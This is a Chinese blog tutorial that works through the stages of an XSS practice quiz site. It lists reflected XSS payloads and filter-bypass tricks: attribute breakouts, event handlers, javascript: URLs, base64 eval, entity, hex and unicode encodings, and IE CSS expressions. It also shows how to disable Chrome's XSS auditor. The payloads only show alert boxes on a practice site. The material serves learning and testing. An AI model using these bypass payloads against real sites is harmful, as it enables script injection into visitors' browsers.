Web安全攻防的学习——09—(XSS攻击方法:16种主要攻击类型和常见的使用类型)

最新推荐文章于 2023-12-12 15:01:17 发布
最新推荐文章于 2023-12-12 15:01:17 发布
阅读量778 收藏 4
点赞数 2
分类专栏: WEB安全攻防的学习 文章标签: javascript web html 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42118531/article/details/104814566
版权

1、XSS攻击

实验环境介绍
地址:https://xss-quiz.int21h.jp/

探测XSS过程

  • 1.构造一个不会被识别为恶意代码的字符串提交到页面中
  • 2.使用浏览器审查工具进行代码审查,寻找构造的字符串是否在页面中显示

1.1 闭合文本标签利用XSS

简单的payload

<script>alert(document.domain);</script>

在这里插入图片描述
当弹出下面的窗口信息的时候,即当前完成此关卡界面的目标。点确定,Next stage进入下一个闯关界面。
在这里插入图片描述

闭合标签的payload

输入
"</b><script>alert(document.domain)</script>
进行闭合网页中的<b>"abc"</b>即可

在这里插入图片描述
** 配置Chrome关闭XSS-Auditor**
https://xss-qhttps://xss-quiz.int21h.jp/
利用XSS过程中会出现下图情况。配置Chrome --args – disable-xss-auditor
在这里插入图片描述
在桌面新建一个快捷方式,键入对象的位置为:

"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --args --disable-xss-auditor

这里创建的chrome浏览器快捷键,已经把浏览器的防止XSS攻击的功能关闭了

1.2 属性中的XSS发现

闭合引号,尖括号,引入script脚本
payload

123"><script>alert(document.domain);</script>

在这里插入图片描述
另一种方法:
属性中的XSS发现
onmouseover 鼠标悬停弹出

输入下面的语句:
"οnmοuseοver=alert(document.domain)>

或者:

" οnmοuseοver= " alert(document.domain)>

在这里插入图片描述

1.3 属性中的XSS发现

select元素可创建单选或多选菜单

<select name="p2">
    <option>Japan</option>
    <option>Germany</option>
    <option>USA</option>
    <option>United Kingdom</option>
</select>

修改网页源码中的下拉菜单选项就可以完成攻击
在select下拉框中输入,闭合标签

Japan</option><script>alert(document.domain);</script>

在这里插入图片描述

1.4 HTML表单隐藏参数介绍

隐藏域是用来收集或发送信息的不可见元素,对于网页的访问者来说,隐藏域是看不见的。 当表单被提交时,隐藏域就会将信息用你设置时定义的名称和值发送到服务器上

修改隐藏属性,修改类型之后,进行闭合,达到XSS攻击效果
"><script>alert(document.domain);</script>

在这里插入图片描述
在这里插入图片描述

HTML表单文本框介绍

<input type='text' name='' value=''>

value       输入字段的初始值
readonly    输入字段为只读(不能修改)
disabled     输入字段是禁用的
size        规定输入字段的字符    最大长度
maxlength   输入字段允许最大长度


type    类型
text    文本
hidden  隐藏
password 密码  输入内容为不可见
name   文本框的名字
value  值

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

1.5 payload触发XSS漏洞

修改maxlength的值,达到XSS攻击效果

"><script>alert(document.domain);</script>

在这里插入图片描述

HTML事件介绍
W3C网址:http://www.w3school.com.cn/tags/html_ref_eventattributes.asp
HTML实体 :https://www.w3school.com.cn/html/html_entities.asp

1.6 通过HTML事件来触发XSS

" οnmοuseοver="alert(document.domain)

" οnclick="alert(document.domain)

在这里插入图片描述

1.7 空格分隔属性中的XSS

按照上面的闭合思路来进行尝试

οnmοuseοver= alert(document.domain)

在这里插入图片描述
** javascript伪协议介绍**
将javascript代码添加到客户端的方法是把它放置在伪协议说明符javascript:后的URL中。这 个特殊的协议类型声明了URL的主体是任意的javascript代码,它由javascript的解释器运行。 如果javascript:URL中的javascript代码含有多个语句,必须使用分号将这些语句分隔开.

 /*var  定义变量*/
 javascript:var now = new Date(); "<h1>The time is:</h1>" + now;

javascript URL还可以含有只执行动作,但不返回值的javascript语句

javascript:alert("hello world!")

在这里插入图片描述

1.8 a链接标签属性

标签定义超链接,用于从一个页面链接到另外一个页面
标签最重要的属性是href属性,它指定链接的目标
在所有浏览器中,链接的默认外观是:

  • 未被访问的链接带有下划线而且是蓝色的
  • 已被访问的链接带有下划线而且是紫色的
  • 活动链接带有下划线而且是红色的
输入下句,点击Make a Link 形成链接
javascript:alert(document.domain);

在这里插入图片描述

1.9 XSS漏洞发现

构造特殊无害字符串,响应中寻找字符串

跳过Stage #9,在span标签中添加 
οnclick= "alert(document.domain)"

在这里插入图片描述

1.10 绕过方法

1.双写绕过

"><script>alert(document.dodomainmain);</script>

在这里插入图片描述
2.编码绕过

"><script>eval(atob('YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=='));</script>

alert(document.domain)编码后为
YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ==

eval 用于执行JavaScript代码
atob 解码base64用于js代码识别

在这里插入图片描述

1.11 绕过替换script和on事件的XSS

在Stage #11演示

&#09;  tab制表符html十进制编码
&#09  代表tab制表符,相当于四个空格   是html编码后链接里的显示
"><a href="javascr&#09ipt:alert(document.domain);">xss</a>

在这里插入图片描述

1.12 利用IE特性绕过XSS过滤

IE中两个反引号``可以闭合一个左边双引号

" `` 可以这样闭合

``οnclick=alert(document.domain)

这个只适用于IE浏览器,其他浏览器不可以使用
在这里插入图片描述

1.13 利用CSS特性绕过XSS过滤

CSS层叠样式表,是一种用来表现HTML或XML等文件样式的计算机语言。可以修饰页面效果,拿网站 效果演示,修改css看页面效果

CSS特性绕过XSS过滤

background:url("javascript:alert(document.domain);"); 设置背景颜色

IETester
官网:https://www.my-debugbar.com/wiki/IETester/HomePage
在IETester中打开Stage #13网址进行测试

在IETester中进行测试,因为各个版本的IE都需要进行测试,Windows10里面自带的IE不会执行
在这里插入图片描述

1.14 IE中利用CSS触发XSS

CSS中执行js**
css expression(css表达式)又称Dynamic properties(动态属性)是早期微软DHTML的产物,以其可以在Css中定义表达式(公式)来达到建立元素间属性之间的联系等作用,从IE5开始得到支持,后因标准、性能、安全性等问题,微软从IE8 beta2标准模式开始,取消对css expression的支

在Stage #14演示
IE5及其以后版本支持在CSS中使用expression,用来把CSS属性和Javascript表达式关联起来

here:expres/\*\*/sion(if(!window.x){alert(document.domain);window.x=1;}); 

here:e\\0xpression(οnmοuseοver=function(){alert(document.domain)})

在这里插入图片描述
十六进制绕过过滤触发XSS
十六进制介绍
十六进制转换有16进制每一位上可以是从小到大为0,1,2,3,4,5,6,7,8,9,A,B,C,D,E,F 16个大小不同 的数,即逢16进1,其中A,B,C,D,E,F(字母不区分大小写),这六个字母来分别表示10,11,12,13,14,15

python16进制转换

import binascii 

s = binascii.b2a_hex(">" .encode("utf8")) 

print(s.decode()) 
print("\\x"+s.decode())

在这里插入图片描述

1.15 双斜杠+16进制绕过

\\x3cscript\\x3ealert(document.domain);\\x3c/script\\x3e

在这里插入图片描述

1.16 unicode绕过过滤触发XSS

unicode介绍

Unicode(万国码、国际码、统一码、单一码)是计算机科学领域里的一项业界标准。它对世界 上大部分的文字系统进行了整理、编码,使得电脑可以用更为简单的方式来呈现和处理文字

Unicode是为了解决传统的字符编码方案的局限而产生的,它为每种中的每个字符设定了统一并 且唯一的二进制编码,满足跨语言、跨平台进行文本转换、处理的要求。

使用Python将字符串转换为unicode类型

import binascii

s = binascii.b2a_hex(">".encode("utf8"))
print(s.decode())

print("\\u00"+s.decode())

同上面介绍的,添加\u是为了让js识别编码,多出来的\是转义字符

XSS攻击

\\u003cscript\\u003ealert(document.domain);\\u003c/script\\u003e

在这里插入图片描述

越过山丘,佳人等候
关注
专栏目录
[网络安全自学篇] 十八.XSS跨站脚本攻击原理及代码攻防演示(一)
杨秀璋的专栏
10-12 2万+
这是作者的系列网络安全自学教程,主要是关于网安工具和实践操作的在线笔记,特分享出来与博友共勉,希望您们喜欢,一起进步。前文分享了Python弱口令攻击、自定义字典生成,并构建了Web目录扫描器;本文将详细讲解XSS跨站脚本攻击,从原理、示例、危害到三常见类型(反射型、存储型、DOM型),并结合代码示例进行详细讲解,最后分享了如何预防XSS攻击。本文参考了爱春秋ADO老师的课程内容,这里也推荐大家观看他Bilibili和ichunqiu的课程,同时也结合了作者之前的编程经验进行讲解。
[网络安全自学篇] 七十八.XSS跨站脚本攻击案例分享及总结(二)
热门推荐
杨秀璋的专栏
05-18 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了肖老师(Seak)的分享,介绍恶意代码与APT攻击中的武器,包括A2PT的攻击武器、普通APT组织的自研恶意代码、商用恶意代码、无恶意代码作业、开源和免费工具等。这些天分享了很多系统安全和软件安全的知识,接下来让我们回归网络安全,做做XSS跨站脚本攻击案例。这些题目来自Fox好友,在此感谢他。主要内容包括XSS原理、不同类型的XSS、XSS靶场9道题目、如何防御XSS。希望您喜欢~
常见XSS攻击方法
商务合作 | 面试培训 | 职场规划 ==>主页扫码
03-20 5552
一、什么是XSS? XSS全称是Cross Site Scripting即跨站脚本,当目标网站目标用户浏览器渲染HTML文档的过程中,出现了不被预期的脚本指令并执行时,XSS就发生了。 这里我们主要注意四点:1、目标网站目标用户;2、浏览器;3、不被预期;4、脚本。 二、XSS有什么危害? 当我们知道了什么是XSS后,也一定很想知道它到底有什么用,或者有什么危害,如何防御。 关于XSS有...
常见网络攻击及防御方法总结(XSS、SQL注入、CSRF攻击
xiaohui的博客
04-05 4406
  从互联网诞生之初起,无时无刻不存在网络攻击,其中XSS攻击和SQL注入攻击是网站应用攻击的最主要的两手段,全球大约70%的网站应用攻击都来自XSS攻击和SQL注入攻击。此外,常用的网站应用攻击还包括CSRF、Session劫持等。 1、 XSS攻击   XSS攻击即跨站点脚本攻击(Cross Site Script),指的是攻击者通过篡改网页,注入恶意的HTML脚本,在用户浏览网页时,控制用户浏览器进行恶意操作的一攻击方式。   常见XSS攻击类型有两,一是反射型,攻击者诱使用户点击一个嵌入恶
XSS漏洞常见攻击方式
天天学安全专属博客
10-08 4179
1.危害 都是通过js脚本来实现的浏览器内核版本也会影响到js代码的实现 1、钓鱼欺骗 2、网站挂马 3、身份盗用 4、盗取网站用户信息 5、垃圾信息发送 6、劫持用户Web行为 7、XSS蠕虫 2.原理 XSS 属于被动式的攻击攻击者先构造一个跨站页面,利用script、、等各方式使得用户浏览这个页面时,触发对被攻击站点的http 请求。此时,如果被攻击者如果已经在被攻击站点登录,就会持有该站点cookie。这样该站点会认为被攻击者发起了一个http 请求。而实际
XSS攻击的三方法
小赵同学的博客
01-06 2462
掌握跨站脚本的概念 理解跨站脚本的实例 什么是XSS? 跨站脚本 1、由于Web应用层序程序对用户的输入过滤不足产生的。 2、攻击者利用漏洞注入恶意JS代码到网页之中,当用户浏览网页时就会执行恶意代码。 3、主要可以对用户cookie资料窃取、会话劫持、钓鱼等。 攻击流程 解:攻击者向服务器发起XSS攻击注入JS代码,用户浏览被攻击的服务器发送浏览请求 服务器返回响应包含攻击者注入的代码 XSS的分类 XSS根据其特性和利用手法分为三大类: 1、反射性跨站脚本 2、存储性跨站脚本 3、DOM
XSS攻击方法总结
bylfsj的博客
09-12 3435
参考链接https://blog.csdn.net/qq_29277155/article/details/51320064 List item
【网络攻防技术】实验七—— XSS攻击实验(Elgg)
qq_45755706的博客
03-01 7605
文章目录一、实验题目二、实验步骤及结果配置相关环境Task1: Posting a Malicious Message to Display an Alert WindowTask 2: Posting a Malicious Message to Display CookiesTask 3: Stealing Cookies from the Victim’s MachineTask 4: Becoming the Victim’s FriendTask 5: Modifying the Victim’s
网络攻防技术——XSS实验
学习记录
02-27 3417
一、题目 跨站点脚本(XSS)是一常见web应用程序中的计算机安全漏洞。此漏洞使攻击者有可能将恶意代码(如JavaScripts)注入受害者的web浏览器。 为了演示攻击者可以做什么,我们在预先构建的Ubuntu VM映像中设置了一个名为Elgg的web应用程序。我们已经注释掉了Elgg的一些保护方法,故意使其容易受到XSS攻击。学生们需要利用这些漏洞发动攻击,就像Samy Kamkar在2005年通过臭名昭著的Samy蠕虫对MySpace所做的那样。此攻击的最终目标是在用户之间传播XSS蠕虫,这样无论
Web安全学习篇——XSS基础知识
Venscor技术养成之路
10-28 2114
之前一直都是做的Android客户端安全,也发现了一些安全问题。但后来,渐渐觉得Android App层安全,尤其是偏上层的安全,往往利用条件比较鸡肋,即使是危害比较大的漏洞。所以从今天起,基本放弃App层上层漏洞挖掘工作,后面像两个方向发展,一是Android App的逆向和加固技术,二是web安全。先从web安全开始!本篇记录XSS基础知识学习过程。一、XSS分类XSS漏洞分成三类,反射型XSS
XSS攻击具体主要是哪些方法?如何防止被攻击呢?
2301_76418831的博客
05-03 586
XSS(跨站脚本攻击)是一常见Web攻击主要是利用网站未对用户输入的数据进行充分过滤,导致恶意脚本被插入到网站的HTML页面中,从而影响到其他用户。3.DOM-based XSS攻击攻击者利用了网站的前端脚本,例如JavaScript等,来修改页面的DOM结构,从而触发恶意脚本。4.对用户输入的数据进行转义:对用户输入的数据进行HTML Entity编码或JavaScript转义,可以防止恶意脚本的注入。为了防止XSS攻击,应该对用户输入的数据进行充分的过滤和验证。1.在表单输入框中输入恶意代码。
XSS跨站之原理分类及攻击手法
YkingH的博客
11-09 3628
web-xss跨站之原理分类及攻击手法 XSS简介 跨站脚本攻击(Cross Site Script),为和层叠样式表区分,安全领域叫做“XSS”。 XSS攻击,通常指黑客通过“HTML注入”篡改了网页,插入了恶意脚本,从而在浏览网页时控制用户浏览器的一攻击。一开始攻击的演示示例是跨域的,而现在由于JavaScript的强大功能以及网站前端应用的复杂化,是否跨域已经不重要。 XSS原理解析 攻击者通过向web页面中注入JavaScript代码(或者ActionScript、VBScript),来获取用户的
XSS攻击绕过方法大全,XSS攻击技巧,收集100绕过方法分享(2024最新)
最新发布
白帽黑客八哥的博客
12-12 6479
尽管许多网站实施了输入过滤措施来防止跨站脚本(XSS)攻击,但在特定条件下,经过精心编码的脚本仍有可能实施XSS注入。本文旨在为专业的安全测试人员提供一个跨站脚本漏洞的检测指南。
快速云:WEB安全XSS攻击方式与防御方式
zyp18065271351的博客
06-14 398
分享IDC知识
web安全之 xss漏洞 xss challenges
m0_46377671的博客
10-20 341
http://xss-quiz.int21h.jp/可用于联系xss漏洞 第一题 直接注入 第二题 查看代码: 制造闭合语句 第三题 直接输入时无变化 使用burp后查看具有两个参数的传递 通过更改两个参数参数的注入 达到目的 p2为主要的参数 试用其判断 两个参数必须有值 开始只改变p1的值没有变化。。。发现p2是主要参数 后来改变p2参数 又忘记改p1了。 第四题 与第四关相似 不过多了个参数p3 尝试使用第三关的方法 不行 看见了这个可与前面第二题相似 尝试 构造闭合 ">
xss 语句大全
kaosini的专栏
06-12 1585
转载地址:http://blog.sina.com.cn/s/blog_3f595e9e010007pf.html alert(document.cookie) ='>cript>alert(document.cookie) alert(document.cookie) alert(vulnerable) %3Cscript%3Ealert('XSS')%3C/script%3E
漏洞篇(XSS跨站脚本攻击二)
m0_58001548的博客
04-16 727
页面中存在一个 p3 参数,type 类型为 hidden,闭合方式为双引号,所以 p3 为隐藏参数。我们使用 burpsuite 进行截断数据包进行分析。p3 的值为 hackme 我们直接插入代码这里必须使用">闭合,这样 XSS 代码才会被执行。
XSS攻击方法
blrk
05-11 1200
首先通过构造XSS代码的方法来构造XSS脚本,用以测试发现漏洞,然后利用以下方法实现攻击。 (1)Redirection - 重定向 重定向被攻击者,如document.location=http://www.evil.com (2)Clickjacking - 点击劫持 可用来钓鱼,如通过onclick触发 (3)URL Spoofing - URL欺骗 常用于钓鱼,页面被劫持并且信
理解Web安全XSS攻击类型与防御策略
"Web安全XSS攻击与防御小结" XSS攻击Web应用程序中常见安全...理解和防范XSS攻击是每个Web开发者必备的安全技能,通过合理的输入验证、输出编码以及使用安全编程最佳实践,可以大大降低网站遭受XSS攻击的风险。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值